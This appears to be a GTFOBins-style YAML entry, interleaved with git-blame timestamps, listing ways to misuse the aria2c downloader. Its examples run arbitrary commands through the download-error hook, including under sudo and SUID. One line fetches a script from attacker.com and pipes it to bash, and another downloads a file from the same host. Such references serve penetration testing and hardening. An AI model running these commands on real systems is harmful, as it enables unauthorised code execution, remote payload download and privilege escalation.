2018-09-07 11:53:15 +02:00
---
2018-09-07 13:30:55 +02:00
description: Note that the subprocess is immediately sent to the background.
2018-09-07 11:53:15 +02:00
functions:
2018-10-05 19:55:38 +02:00
command:
2018-09-07 13:30:55 +02:00
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
aria2c --on-download-error=$TF http://x
2018-09-07 13:46:22 +02:00
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
2018-09-07 13:30:55 +02:00
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
2023-01-07 20:14:40 +01:00
file-download:
- description: Fetch a remote file via HTTP GET request. Use `--allow-overwrite` if needed.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
aria2c -o "$LFILE" "$URL"
2021-01-11 12:45:21 +01:00
sudo:
2018-09-07 13:30:55 +02:00
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
2021-01-11 12:45:21 +01:00
sudo aria2c --on-download-error=$TF http://x
limited-suid:
2018-09-07 13:30:55 +02:00
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
2021-01-11 12:45:21 +01:00
./aria2c --on-download-error=$TF http://x
2018-09-07 11:53:15 +02:00
---